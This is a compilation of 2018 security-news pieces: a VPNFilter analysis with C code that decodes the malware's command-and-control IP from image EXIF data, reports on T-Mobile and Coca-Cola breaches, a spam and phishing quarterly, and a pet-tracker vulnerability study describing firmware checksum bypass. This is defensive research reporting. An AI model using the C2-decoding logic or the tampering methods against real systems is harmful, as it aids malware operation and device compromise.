    octets[0] = o1p1 + ( o1p2 + 0x5A );
    octets[1] = o2p1 + ( o1p2 + 0x5A );
    octets[2] = o3p1 + ( o3p2 + 0xB4 );
    octets[3] = o4p1 + ( o3p2 + 0xB4 );

    printf("%u.%u.%u.%u\n", octets[0], octets[1], octets[2], octets[3]);
    return 0;
}

The implementation of the EXIF parser appears to be pretty generic. The fact that it correctly handles the byte order (swapping the data, if required) and traverses all EXIF records skipping them correctly, and that the GPS data is converted to a string and then back to integers most likely indicates that the code was reused from an EXIF-parsing library or toolkit.

For the values provided here, the code will produce the IP address “217.12.202.40” that is a known C&C of VPNFilter.
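To make the traversal described above concrete, here is an added C example (our own code for this write-up, not the sample’s code and not from the Talos analysis) that performs the same steps an analyst needs to recover the address from a fetched image: find the FF E1 “Exif” segment, honour the II/MM byte order, walk IFD0 to the GPS Info IFD, read the latitude and longitude numerators and apply the octet formula. The image it parses is constructed inline from the update.jpg numerators; the function and constant names are ours.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Helpers that honour the TIFF byte-order mark: le=1 for "II" (little endian), 0 for "MM". */
static uint32_t rd16(const uint8_t *p, int le) { return le ? (p[0] | p[1] << 8) : (p[0] << 8 | p[1]); }
static uint32_t rd32(const uint8_t *p, int le) {
    return le ? ((uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24)
              : ((uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | (uint32_t)p[3]);
}
static void wr16(uint8_t *p, uint32_t v, int le) { p[le ? 0 : 1] = v & 0xFF; p[le ? 1 : 0] = (v >> 8) & 0xFF; }
static void wr32(uint8_t *p, uint32_t v, int le) { wr16(p + (le ? 0 : 2), v & 0xFFFF, le); wr16(p + (le ? 2 : 0), v >> 16, le); }

/* Walk one IFD (entry count, then 12-byte entries: tag(2) type(2) count(4) value/offset(4)).
   Returns 1 and the value/offset field of the entry with `tag`, 0 if absent or out of bounds. */
static int find_tag(const uint8_t *t, size_t tlen, uint32_t ifd, int le, uint32_t tag, uint32_t *out)
{
    if ((size_t)ifd + 2 > tlen) return 0;
    uint32_t n = rd16(t + ifd, le);
    for (uint32_t i = 0; i < n; i++) {
        size_t e = (size_t)ifd + 2 + 12 * i;
        if (e + 12 > tlen) return 0;                      /* truncated IFD: stop rather than read past the buffer */
        if (rd16(t + e, le) == tag) { *out = rd32(t + e + 8, le); return 1; }
    }
    return 0;
}

/* Read the numerators of three RATIONAL (numerator, denominator) pairs: degrees, minutes, seconds. */
static int read_numerators(const uint8_t *t, size_t tlen, uint32_t off, int le, uint32_t num[3])
{
    if ((size_t)off + 24 > tlen) return 0;
    for (int i = 0; i < 3; i++) num[i] = rd32(t + off + 8 * i, le);
    return 1;
}

/* Locate the APP1 "Exif" segment, follow IFD0 -> GPS Info (0x8825) -> GPSLatitude (2) / GPSLongitude (4),
   and apply the octet formula from the sample. Returns 1 and fills ip[4], or 0 for malformed input. */
int exif_gps_to_ip(const uint8_t *buf, size_t len, uint8_t ip[4])
{
    size_t i;
    for (i = 0; i + 10 <= len; i++)                       /* FF E1, 2-byte length, then "Exif\0\0" */
        if (buf[i] == 0xFF && buf[i + 1] == 0xE1 && memcmp(buf + i + 4, "Exif\0\0", 6) == 0) break;
    if (i + 10 > len) return 0;
    size_t seglen = (size_t)(buf[i + 2] << 8 | buf[i + 3]);  /* APP1 length is always big-endian */
    if (seglen < 16 || i + 2 + seglen > len) return 0;        /* it counts itself and "Exif\0\0" */
    const uint8_t *t = buf + i + 10;                          /* start of the TIFF header */
    size_t tlen = seglen - 8;
    int le;
    if (memcmp(t, "II", 2) == 0) le = 1; else if (memcmp(t, "MM", 2) == 0) le = 0; else return 0;
    if (rd16(t + 2, le) != 0x2A) return 0;
    uint32_t gps, lat_off, lon_off, lat[3], lon[3];
    if (!find_tag(t, tlen, rd32(t + 4, le), le, 0x8825, &gps)) return 0;
    if (!find_tag(t, tlen, gps, le, 2, &lat_off) || !find_tag(t, tlen, gps, le, 4, &lon_off)) return 0;
    if (!read_numerators(t, tlen, lat_off, le, lat) || !read_numerators(t, tlen, lon_off, le, lon)) return 0;
    /* Same arithmetic as the sample: the byte store keeps only the low 8 bits of each sum, so
       numerators that wrapped to "negative" values (4294967121 == -175 mod 2^32) work as intended. */
    ip[0] = (uint8_t)(lat[1] + lat[0] + 0x5A);
    ip[1] = (uint8_t)(lat[2] + lat[0] + 0x5A);
    ip[2] = (uint8_t)(lon[1] + lon[0] + 0xB4);
    ip[3] = (uint8_t)(lon[2] + lon[0] + 0xB4);
    return 1;
}

/* Constructed test image: SOI + one APP1 segment holding just IFD0 -> GPS IFD -> six rationals,
   with the GPS numerators of update.jpg quoted above. Writes 116 bytes into b and returns that count. */
size_t build_sample(uint8_t *b, int le)
{
    static const uint32_t lat_num[3] = {97, 30, 4294967121u};
    static const uint32_t lon_num[3] = {4294967178u, 140, 4294967274u};
    static const uint8_t hdr[12] = {0xFF, 0xD8, 0xFF, 0xE1, 0x00, 0x70, 'E', 'x', 'i', 'f', 0, 0}; /* length 0x70 = 112 */
    uint8_t *t = b + 12;
    memcpy(b, hdr, 12);
    memcpy(t, le ? "II" : "MM", 2); wr16(t + 2, 0x2A, le); wr32(t + 4, 8, le);
    wr16(t + 8, 1, le);                                       /* IFD0: one entry, GPS Info, type LONG */
    wr16(t + 10, 0x8825, le); wr16(t + 12, 4, le); wr32(t + 14, 1, le); wr32(t + 18, 26, le);
    wr32(t + 22, 0, le);                                      /* no next IFD */
    wr16(t + 26, 2, le);                                      /* GPS IFD: tags 2 and 4, type RATIONAL, count 3 */
    wr16(t + 28, 2, le); wr16(t + 30, 5, le); wr32(t + 32, 3, le); wr32(t + 36, 56, le);
    wr16(t + 40, 4, le); wr16(t + 42, 5, le); wr32(t + 44, 3, le); wr32(t + 48, 80, le);
    wr32(t + 52, 0, le);
    for (int i = 0; i < 3; i++) {                             /* rational = numerator, then denominator 1 */
        wr32(t + 56 + 8 * i, lat_num[i], le); wr32(t + 60 + 8 * i, 1, le);
        wr32(t + 80 + 8 * i, lon_num[i], le); wr32(t + 84 + 8 * i, 1, le);
    }
    return 116;
}

int main(void)
{
    uint8_t buf[128], ip[4];
    size_t n = build_sample(buf, 1);
    if (exif_gps_to_ip(buf, n, ip))
        printf("%u.%u.%u.%u\n", (unsigned)ip[0], (unsigned)ip[1], (unsigned)ip[2], (unsigned)ip[3]); /* 217.12.202.40 */
    return 0;
}
```

Running the parser over a real image fetched from the C2 URL works the same way once the file is read into a buffer; the bounds checks are there because a truncated or hostile EXIF block must not crash the triage tool.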

It should be noted that this IP is included in Cisco Talos’ IOCs list as a known C&C. Currently, it appears to be down.

What’s next?
Perhaps the most interesting question is who is behind VPNFilter. In their affidavit for sinkholing the malware C2, the FBI suggests it is related to Sofacy:

Interestingly, the same Affidavit contains the following phrase: “Sofacy Group, also known as apt28, sandworm, x-agent, pawn storm, fancy bear and sednit”. This would suggest that Sandworm, also known as BlackEnergy APT, is regarded as subgroup of Sofacy by the FBI. Most threat intel companies have held these groups separate before, although their activity is known to have overlapped in several cases.

Perhaps the most interesting technical detail, which Cisco Talos points out in their blog linking VPNFilter to BlackEnergy, is the usage of a flawed RC4 algorithm. The RC4 key scheduling implementation in both is missing the typical “swap” at the end of the loop. While rare, this mistake (or perhaps optimization) from BlackEnergy has been spotted by researchers and described publicly going as far back as 2010. For instance, Joe Stewart’s excellent analysis of BlackEnergy2 explains this peculiarity.

So, is VPNFilter related to BlackEnergy? If we consider the RC4 key scheduling implementation alone, we can say there is only a low-confidence link. However, it should be noted that BlackEnergy is known to have deployed router malware going back as far as 2014, which we described in our blogpost “BE2 custom plugins, router abuse, and target profiles”. We continue to look for other similarities which could support this theory.


A bug in T-Mobile site allowed anyone see any customer’s account details
27.5.2018 securityaffairs Incident Hacking

A flaw in T-Mobile’s website allowed anyone to access the personal account details of any customer by providing their mobile number.
The bug discovered by the researcher Ryan Stevenson resides in the T-Mobile subdomain promotool.t-mobile.com used by the staff as a customer care portal to access the company’s internal tools.

The promotool.t-mobile.com subdomain contained a hidden API that would return customer data simply by invoking it with the customer’s cell phone number as a parameter.

The data leak was caused by the lack of any authentication mechanism for calling the API: anyone could have accessed any customer record, including full name, postal address, billing account number, and in some cases information about tax identification numbers.

The exposed records also included references to account PINs, which customers use as a security question when they contact customer care; this means that an attacker could have used that information to impersonate a customer and take over their account.

“Although the API is understood to be used by T-Mobile staff to look up account details, it wasn’t protected with a password and could be easily used by anyone.” reported ZDnet.

“The returned data included a customer’s full name, postal address, billing account number, and in some cases information about tax identification numbers. The data also included customers’ account information, such as if a bill is past-due or if the customer had their service suspended.”

t-mobile-data leak

Searching for the portal on the Wayback Machine, we can verify that the subdomain had been online since at least October.

Stevenson reported the flaw to the telco giant in early April; the company quickly disabled the API and awarded the researcher $1,000 under its bug bounty program.

“The bug bounty program exists so that researchers can alert us to vulnerabilities, which is what happened here, and we support this type of responsible and coordinated disclosure.” said T-Mobile spokesperson.

“The bug was patched as soon as possible and we have no evidence that any customer information was accessed,” the spokesperson added.

This isn’t the first time T-Mobile has had such issues: in October, Motherboard reported another API accessible from a different T-Mobile subdomain.

In February, Motherboard journalist Lorenzo Franceschi-Bicchierai published an interesting post on SIM hijacking reporting that T-Mobile customers were victims of an info disclosure exploit.


Coca-Cola data breach has affected about 8,000 workers
27.5.2018 securityaffairs Incident

Coca-Cola discovered a security breach in September when law enforcement officials notified it that a former employee at a Coca-Cola subsidiary was found in possession of an external hard drive containing worker data.
Coca-Cola announced a data breach after a former employee was found in possession of worker data on a personal hard drive. In compliance with state laws, the company is notifying affected employees of the data breach by letter.

The company discovered the security breach in September when law enforcement officials notified it that a former employee at a Coca-Cola subsidiary was found in possession of an external hard drive.

Coca-Cola supported the investigation conducted by law enforcement and confirmed the authenticity of the documents, which contained personal information of some workers.

The company did not disclose the incident immediately at the request of authorities who were investigating the data breach.

Following state laws, the company is now sending notification letters to affected employees.

According to a company spokesman, the data breach has affected about 8,000 workers.

“We are issuing data breach notices to about 8,000 individuals whose personal information was included in computer files that a former employee took with him when he left the company,” a company spokesperson told Bleeping Computer.

“We take information security very seriously, and we sympathize with everyone whose information may have been exposed. We regret any inconvenience or concern this may be causing them. We do not have any information to suggest that the information was used to commit identity theft.”

As usually happens in these cases, Coca-Cola is offering free identity monitoring for one year to affected employees.

Back in 2014, Coca-Cola warned some 74,000 employees and other individuals that their personal information was compromised due to the theft of several company laptops.


Spam and phishing in Q1 2018
27.5.2018  Kaspersky  Analysis
Phishing 

Quarterly highlights
Data leaks
Early 2018 will be remembered for a series of data leak scandals. The most high-profile saw Facebook CEO Mark Zuckerberg grilled by US Congress, with many public figures supporting the Delete Facebook campaign. As a result, Zuckerberg promised to get tough and make it more difficult to harvest data from third-party apps.

But the buck doesn’t stop entirely with the tech giants—personal data often ends up in cybercriminal hands due to user carelessness. Some techniques may be timeworn, but one in particular still reels in the victims: Facebook users are one of the juiciest targets for cyberfraudsters looking to launch mass phishing attacks. Last year Facebook was one of the Top 3 most exploited company names. The schemes are numerous, but fairly standard: the user is asked to “verify” an account or lured into signing into a phishing site on the promise of interesting content.

Examples of phishing pages mimicking Facebook login

Fake pages such as these exist in all languages supported by the social media. Sometimes the correct localization is selected automatically based on the victim’s IP address.

Example of code used by cybercriminals to determine the victim’s location and adapt the phishing page

Data often falls into the hands of cybercriminals through third-party apps that users themselves give access to their accounts and sometimes even allow to post messages on their own behalf.

In early March, for instance, several hundred VKontakte users were hit when third parties gained access to their private correspondence. This happened as a result of apps using the social network’s open API to request access to personal data without guaranteeing its safe storage and use.

In the headline-grabbing case of Cambridge Analytica’s This Is Your Digital Life app, users also handed over personal information voluntarily. Carelessness is the culprit: many people are unaware of just how much data they give away in personality quizzes.

Social media quizzes often ask for a lot of user data.

Remember that cybercriminals often use social media to spread malicious content. For example, we wrote about fake airline giveaways, adult video spam, and even an Alberto Suárez phishing petition.

Another major personal data story was the appearance in Russia of the GetContact app for smartphones, which not only tells users who’s calling, but shows the names under which their contacts are saved in other app users’ phone books. For this, the program needs to be fed not just the user’s own data, but the entire address book (photos, email addresses, even conversation history). That earned GetContact a ban in several countries (even before it appeared in Russia).

Telegram, ICOs, cryptocurrencies
In Q1 a battle royale broke out over the Telegram messenger. It all began late last year with talk of an upcoming ICO. That provided the backdrop for cybercriminals to create fake sites, which by the end of Q1 had allegedly raked in as much as the company’s rumored private ICO.

Fake site offering the chance to participate in the Telegram ICO

That was followed by a wave of phishing mailshots to owners of major Russian channels in Telegram. An account under the name Telegram (or something similar) sent a message informing potential victims that suspicious activity had been detected on their account and that confirmation was required to avoid having it blocked. A link was provided to a phishing site masquerading as the login page for the web version of Telegram.

Phishing site mimicking the web version of the Telegram app

If the victim agreed to fill out the form, the cybercriminals gained access to their account, plus the ability to link it to another phone number.

Another spike in scamming activity was recorded when the Internet was buzzing about the imminent takedown of the messenger in Russia. And when the messenger suffered a power outage in a server cluster, it was widely perceived as the start of the ban. Replying to Pavel Durov’s tweet about the malfunction, enterprising cybercriminals offered compensation on his behalf in cryptocurrency. To claim it, users had to follow a link to a site where they were asked to transfer a sum of money to a specified wallet number to receive their “compensation.”

But Telegram does not have a monopoly over the cryptocurrency topic this quarter. We repeatedly encountered phishing sites and email messages exploiting the launch of new ICOs. Cryptocurrency scams often bring in millions of dollars, which explains why cybercriminals are so fond of them.

For instance, on January 31–February 2 the Bee Token startup held an ICO for which participants had to register in advance on the project website, specifying their email address. Cybercriminals managed to get hold of a list of email addresses of potential investors and send out a timely invitation containing e-wallet details for making Ethereum-based investments.

Phishing email supposedly sent from the ICO organizers

123,3275 ether were transferred to this wallet (around $84,162.37). Fraudsters also set up several phishing sites under the guise of the platform’s official site.

A similar scam occurred with the Buzzcoin ICO. The project website invited users to subscribe to a newsletter by leaving an email address. The day before the official ICO start, subscribers received a fraudulent message about the start of pre-sales with a list of cryptowallets to which money should be transferred.

Phishing email supposedly sent from the ICO organizers

Cybercriminals scooped about $15,000 before the organizers took action.

GDPR
One measure that addresses user safety is the General Data Protection Regulation (GDPR), a general policy on the protection and privacy of individuals. This EU regulation has a direct bearing on all companies that process data belonging to EU residents, and therefore has an international scope. The GDPR becomes enforceable on May 25 this year and stipulates large fines (up to EUR 20 million or 4% of annual revenue) for companies whose information activity does not comply with the regulation.

Such a landmark event in the IT world could hardly fail to attract cybercriminals, and in recent months (since the end of last year) we have registered a large number of spam emails related one way or another to the GDPR. It is generally B2B spam—mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

We also came across spam offers to install on the target company’s main website or landing page special fee-based software providing web resources with everything necessary to comply with the new rules. Moreover, the site owner would supposedly be insured against problems relating to user data security.

Spam traffic also contained offers to acquire ready-made specialized databases of individuals and legal entities broken down by business division or other criteria. The sellers had no scruples about stressing that all addresses and contacts for sale were already GDPR-compliant. In fact, harvesting user data and reselling it to third parties without the consent of the owners and data carriers violates not only this regulation, but also the law in general.

Example of a spam message exploiting the GDPR topic

Note that legitimate mailers also became more active. They are already sending notices to users describing the new rules and asking for consent to use and process their data under the new policy. When the new regulation enters into force, the number of such notices will skyrocket, so we predict a surge in scam mailings aimed at obtaining personal info and authentication data for access to various accounts. We urge users to pay close attention to the new regulation and carefully study any notifications related to it. Links should be checked before clicking: they should not contain redirects to third-party sites or domains unrelated to the service on whose behalf the message was sent.

Political spam
In the runup to the Russian presidential elections, we observed a range of political spam, including messages promoting or slurring various candidates. The election topic was used for fraud: cybercriminals sent email messages offering a financial reward for taking part in public opinion polls, as a result of which money ended up being transferred in the opposite direction.

Example of a message inviting recipients to take part in a poll

Phishing for taxpayers
Every country has its own tax year, but as a rule the most active period for dealing with tax services comes at the start of the year. In Q1 we registered many phishing pages mimicking the IRS, HMRC, and other countries’ tax services.

Fake tax service websites

Spam-based malware
Back in Q1 2017 we wrote about a mailout disguised as a resume concealing a malicious file from the Fareit Trojan spyware family. In the same quarter of 2018, cybercriminals attempted to infect users’ computers with the Smoke Loader backdoor, also known as Dofoil. Its toolbox includes downloading and installing malware such as cryptocurrency miners, banking Trojans, and ransomware. Smoke Loader could also disable some antivirus software and hide from detection by integrating itself into system processes.

The text of the malicious mailshot varied, with some messages imitating the business correspondence of real company employees. To open the password-protected DOC attachment, the user had to enter the password specified in the message, which triggered a request to enable macros (disabled by default); confirmation proved fatal for message recipients. We observed a trend for password-protected malicious attachments in Q1 2018: such protection hinders detection and increases the chances that the message will reach the recipient.

Examples of emails with malicious attachments

Another long-established social engineering method exploits user fears of infection, data leakage, access denial, and other bugbears. In Q1, this old trick was used to dupe users into parting with cryptocurrency. Most messages tried to scare recipients by reporting that malware was installed on their computer and that personal info (lists of contacts, monitor screenshots, webcam videos, etc.) was compromised. If the scammers didn’t receive a hush payment, it was said, the harvested information would be sent to all the victim’s contacts.

Example of a message with a ransom demand in exchange for not publicizing the victim’s personal data

Some messages from cybercriminals tried not only to extract money, but to install malware on recipients’ computers. The malware was located in a protected archive attachment that the attackers claimed was proof that they had the victim’s data.

Malware under the guise of proving cybercriminal intent

Statistics: spam
Proportion of spam in email traffic

Proportion of spam in global email traffic, Q4 2017 and Q1 2018

In Q1 2018, the largest share of spam was recorded in January (54.50%). The average share of spam in global email traffic was 51.82%, down 4.63 p.p. against the figure for Q4 2017.

Sources of spam by country


Sources of spam by country, Q1 2018

Q1 2018 results put Vietnam (9.22%) top of the leaderboard of spam sources by country. In second place, just 0.64 p.p. behind, came the US (8.55%). The rating’s frequent leader China (7.87%) slipped to third, while India (7.10%) and Germany (6.35%) claimed fourth and fifth. The Top 10 is rounded off by Iran (2.51%).

Spam email size

Spam email size, Q4 2017 and Q1 2018

In Q1 2018, the share of very small emails (up to 2 KB) in spam increased by 19.79 p.p. to 81.62%. Meanwhile, the proportion of emails between 5 and 10 KB in size fell (by 6.05 p.p.) against the previous quarter to 4.11%.

The number of emails between 10 and 20 KB also decreased (by 4.91 p.p.). Likewise, there were fewer emails sized 20 to 50 KB—this quarter they made up just 2.72% of the total, which represents a drop of 6.81 p.p. compared to the previous reporting period.

Malicious attachments in email
Top 10 malware families


Top 10 malware families, Q1 2018

The most widespread malware family in email traffic this quarter was Trojan-PSW.Win32.Fareit (7.01%), with Backdoor.Java.QRat (6.71%) and Worm.Win32.WBVB (5.75%) completing the Top 3. Fourth place went to Backdoor.Win32.Androm (4.41%), and Trojan.PDF.Badur (3.56%) rounds off the Top 5.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggers by country, Q1 2018

Germany (14.67%) was this quarter’s leader by number of Mail Anti-Virus triggers, followed by Russia on 6.37% and Britain with a score of 5.43%. Fourth and fifth positions were occupied by Italy (5.40%) and the UAE (4.30%).

Statistics: phishing
In Q1 2018, the Anti-Phishing module prevented 90,245,060 attempts to direct users to scam websites. The share of unique users attacked made up 9.6% of all users of Kaspersky Lab products worldwide.

Geography of attacks
The country with the largest percentage of users affected by phishing attacks in Q1 2018 was Brazil (19.07%, -1.72 p.p.).

Geography of phishing attacks*, Q1 2018

* Number of users on whose computers Anti-Phishing was triggered as a percentage of the total number of Kaspersky Lab users in that country

Second came Argentina (13.30%), and third place was taken by Venezuela (12.90%). Fourth and fifth went to Albania (12.56%) and Bolivia (12.32%).

Country      %
Brazil       19.07
Argentina    13.30
Venezuela    12.90
Albania      12.56
Bolivia      12.32
Réunion      11.88
Belarus      11.62
Georgia      11.56
France       11.40
Portugal     11.26

Top 10 countries by percentage of users attacked by phishers, Q1 2018

Organizations under attack
Rating of categories of organizations attacked by phishers
The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2018, the Global Internet Portals category again took first place with 23.7% (-2.56 p.p.).

Distribution of organizations affected by phishing attacks by category, Q1 2018

However, the combined financial category—banks (18.25%), online stores (17.26%), payment systems (8.41%)—still accounted for almost half of all attacks (43.92%), which is up 4.46 p.p. against the previous quarter. The next categories in descending order were Government Organizations (4.75%), Social Networks and Blogs (4.11%), Telecommunications Companies (2.47%), IT Companies (1.55%), Messengers (0.66%), Online Games (0.43%), and Airlines (0.07%).

Conclusion
The quarter’s main topic, one that we will likely return to many times this year, is personal data. It remains one of the most sought-after wares in the world of information technology for app and service developers, owners of various agencies, and, of course, cybercriminals. Unfortunately, many users still fail to grasp the need to protect their personal information and don’t pay attention to whom and how their data is transferred in social media.

Cybercriminal interest in personal data is confirmed by our analysis of spam traffic, where one of the main topics remains mail phishing employing a range of social and technical engineering methods. Throughout the quarter, we observed fake notifications on behalf of social media and popular services, bank phishing, and “Nigerian prince” emails.

The GDPR, set to come on stream in late May, is intended to correct the situation regarding personal data, at least in the EU. Time will tell how effective it is. But one thing is clear: even before its introduction, the new regulation is being actively exploited as a topic by cybercriminals and many others. Regrettably, the GDPR is unlikely to fix the situation.

In Q1 2018, the average share of spam in global email traffic was 51.82%, down 4.63 p.p. against Q4 2017; the Anti-Phishing module blocked 90,245,060 attempts to direct users to fraudulent pages; and Brazil (19.07%, -1.72 p.p.) had the largest share of users attacked by phishers.

Based on the quarter results, it is safe to predict that scammers will continue to exploit “fashionable” topics, two of which are cryptocurrencies and new ICOs. Given that these topics have begun to attract interest from the general public, a successful attack can reap vast rewards.


I know where your pet is
26.5.2018 Kaspersky
Vulnerability
Kaspersky Lab’s many years of cyberthreat research would suggest that any device with access to the Internet will inevitably be hacked. In recent years, we have seen hacked toys, kettles, cameras, and irons. It would seem that no gadget has escaped the attention of hackers, yet there is one last bastion: “smart” devices for animals. For example, trackers to monitor their location. Such gadgets can have access to the owner’s home network and phone, and their pet’s location.

This report highlights the potential risks for users and manufacturers. In it, we examine several trackers for potential vulnerabilities. For the study, we chose some popular models that have received positive reviews:

Kippy Vita
LINK AKC Smart Dog Collar
Nuzzle Pet Activity and GPS Tracker
TrackR bravo and pixel
Tractive GPS Pet Tracker
Weenect WE301
Whistle 3 GPS Pet Tracker & Activity Monitor
Technologies used: Bluetooth LE
Four of the trackers in the study use Bluetooth Low Energy (BLE), which in many cases is the weak spot in the device’s protective armor. Let’s take a closer look at this technology. BLE is an energy-saving Bluetooth specification widely used in IoT devices. What we’re interested in is the lack of authentication and the availability of services and characteristics.

Unlike “classic” Bluetooth, where peer devices are connected using a PIN code, BLE is aimed at non-peer devices, one of which may not have a screen or keyboard. Thus, PIN code protection is not implemented in BLE — authentication depends entirely on the developers of the device, and experience shows that it is often neglected.

The second feature of interest to us is the availability of services, characteristics, and descriptors. They form the basis for data transfer between devices in the BLE specification. As we already noted, BLE works with non-peer devices, one of which (the one that does the connecting) is usually a smartphone. The other device, in our case, is a tracker. After connecting to it, several BLE services are available to the smartphone. Each of them contains characteristics which in turn may have descriptors. Both characteristics and descriptors can be used for data transfer.

Hence, the correct approach to device security in the case of BLE involves pre-authentication before characteristics and descriptors are made available for reading and writing. Moreover, it is good practice to break the link shortly after connecting if the pre-authentication stage is not passed. In this case, authentication should be based on something secret that is not accessible to the attacker—for example, the first part of the data can be encrypted with a specific key on the server (rather than the app) side. Or transmitted data and the MAC address of the connected device can be confirmed via additional communication channels, for example, a built-in SIM card.

Kippy Vita
This tracker transfers GPS coordinates to the server via its built-in SIM card, and the pet’s location is displayed in the mobile app. The tracker does not interface “directly” with the smartphone. We could not detect any problems in the device itself, so we turned our focus to the mobile apps.

Here, too, everything looked pretty good: SSL Pinning was implemented, unlike in any other app we tested. Moreover, the Android app encrypts important data before saving it to its own folder.

The only problem we did detect was that the app for Android logs data that is transmitted to the server. This data can include the user’s password and login, as well as an authentication token.


Output of the Kippy Vita app with user login and password

Despite the fact that not all apps can read logs (only system apps or ones with superuser rights), it is still a major security issue.

Registered CVE:
CVE-2018-9916

Link AKC
This tracker monitors the pet’s location via GPS and transfers coordinates via the built-in SIM card. What’s more, it can interface with the owner’s phone directly — via Bluetooth LE. This means that it is always ready to accept connections from devices, which makes it a good starting point for the study.

We were pleasantly surprised by Link AKC: the developers did everything right in terms of securing the connection to the smartphone. We couldn’t find any major problems, which is rare for devices with BLE support.

After the smartphone connects to the device and discovers its services, it must enable notifications (that is, subscribe to value changes) on two characteristics and a descriptor; otherwise the tracker breaks the link. After that, Link AKC is ready to receive commands. These must contain the user ID; if the user does not have rights to use the tracker, the command is not executed. This maintains control over access rights. Even using the ID obtained from the tested device, we could not make the gadget execute a command from another smartphone—it appears that the tracker checks the smartphone’s MAC address.

However, the device cannot be described as completely secure. In the app for Android, we found that the developers had forgotten to disable logging. As a result, the app transfers lots of data to logcat, including:

the app’s authorization token, which if intercepted can be used to sign into the service and discover the pet’s location:

User registration data, including name and email address:

Device coordinates:

Starting with Android 4.1, only some system apps or apps with superuser rights can read the logs of other programs. It is also possible to gain access when connecting the smartphone to a computer, but this requires Android developer mode to be activated.

Despite these restrictions, it is still a problem: attackers can get hold of data to access the victim’s account, even if the likelihood of this happening is small.

On top of that, the Android app does not verify the server’s HTTPS certificate, exposing it to man-in-the-middle (MITM) attacks. For a successful attack, attackers need only install their own certificate on the smartphone (which is quite simple to do), allowing them to intercept all transmitted data, including passwords and tokens used for account access:


The Link AKC app for Android is vulnerable to MITM attacks

The authorization token is also stored in unencrypted form in the app folder. Although superuser rights are needed to access it, it is still not the best place to store important data.

The authorization token is stored in unencrypted form

Registered CVE:
CVE-2018-7041

Nuzzle
In terms of functionality, Nuzzle is like the previous tracker: it too uses a SIM card to transmit the pet’s GPS coordinates and can connect directly to a smartphone via BLE. But on the latter point, Nuzzle performed less well than Link AKC: the lack of authorization and access control means that the device is ready to interface with any smartphone. This lets an attacker take control of the device just like the owner. For example, an attacker can quickly drain the battery by switching on the light (which requires changing the value of just one attribute).

An attacker can receive data from the device as soon as a connection is made. Data is available in two characteristics: one contains telemetry information, including device location, while the other provides device status information (in particular, temperature and battery charge).

What is worse, the continuous reading of data from the telemetry characteristic results in the device being “lost”: to save battery power, the gadget does not transmit coordinates via the mobile network if they have already been sent via BLE. Thus, it is possible to conceal the location of the pet simply by connecting to the tracker using a smartphone.

We detected another security hole in the process of updating the device firmware. The integrity control was found to be easy to bypass. Basically, the firmware consists of two files with the extensions DAT and BIN. The first contains information about the firmware, including the checksum (CRC16) used in the integrity control, and the second contains the firmware itself. All it takes to install modified software on the tracker is to change the checksum in the DAT file.

AT commands in Nuzzle firmware

To cripple the device, we didn’t even need to analyze the firmware: it is not encrypted or packed, so just by opening it in a hex editor we were able to find the AT commands and the host used to send data by means of the SIM card. After we changed several bytes in the host, updated the firmware checksum, and uploaded it to the device, the tracker stopped working.
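The firmware check described above illustrates a general point: a CRC is an error-detection code, not an integrity control, because anyone who can modify the image can also recompute it. The following is an added example written for this page (not Nuzzle’s firmware or Kaspersky’s code) showing the regression test a firmware team would keep: a DAT-style metadata record with a CRC16 accepts a modified image once the checksum is recomputed, while a record carrying a keyed MAC does not. The file layout, `build_dat`, `VENDOR_KEY` and the sample image are constructed for the example; a real update path would verify an asymmetric signature so that no secret has to live on the device, and HMAC is used here only because it is in the standard library.

```python
import hashlib
import hmac


def crc16_ccitt(data: bytes) -> int:
    """CRC-16/CCITT-FALSE (poly 0x1021, init 0xFFFF). Any CRC-16 variant shows
    the same weakness: the computation involves no secret."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ 0x1021) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


# Constructed vendor key for the example; it is never shipped to the device.
VENDOR_KEY = b"constructed-vendor-signing-key"


def build_dat(firmware: bytes) -> dict:
    """Stand-in for the DAT metadata file: version, size and CRC16 of the image."""
    return {"version": "demo-1", "size": len(firmware), "crc16": crc16_ccitt(firmware)}


def verify_with_crc(dat: dict, firmware: bytes) -> bool:
    """The weak check: size and CRC16 must match the image."""
    return dat["size"] == len(firmware) and dat["crc16"] == crc16_ccitt(firmware)


def build_signed_dat(firmware: bytes, key: bytes = VENDOR_KEY) -> dict:
    """Metadata that additionally carries a keyed MAC over the image."""
    dat = build_dat(firmware)
    dat["mac"] = hmac.new(key, firmware, hashlib.sha256).hexdigest()
    return dat


def verify_with_mac(dat: dict, firmware: bytes, key: bytes = VENDOR_KEY) -> bool:
    """The hardened check: CRC for transport errors, MAC for tampering."""
    expected = hmac.new(key, firmware, hashlib.sha256).hexdigest()
    return verify_with_crc(dat, firmware) and hmac.compare_digest(dat.get("mac", ""), expected)


def tamper_demo() -> dict:
    """Regression test: does each verifier reject a modified image whose
    metadata was recomputed by someone who does not hold the key?"""
    original = b"DEMO-FW-1.0 config=v1 host=update.example.invalid\x00"  # constructed image
    dat = build_signed_dat(original)
    modified = original.replace(b"config=v1", b"config=v2")     # same length, one field changed
    forged = dict(dat)
    forged["crc16"] = crc16_ccitt(modified)                      # anyone can recompute a CRC
    return {
        "crc_accepts_original": verify_with_crc(dat, original),
        "crc_accepts_forged": verify_with_crc(forged, modified),
        "mac_accepts_original": verify_with_mac(dat, original),
        "mac_accepts_forged": verify_with_mac(forged, modified),
    }


if __name__ == "__main__":
    for check, outcome in tamper_demo().items():
        print(f"{check}: {outcome}")
```

`tamper_demo()` returns `crc_accepts_forged` as `True` and `mac_accepts_forged` as `False`: the CRC-only verifier is exactly as strong as the secrecy of the CRC algorithm, which is none.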

As in the case of Link AKC, the Nuzzle app for Android does not check the server certificate, and the authentication token and user email address are stored in the app folder in unencrypted form.


Unencrypted authorization token and user email address

Registered CVE:
CVE-2018-7043
CVE-2018-7042
CVE-2018-7045
CVE-2018-7044

TrackR
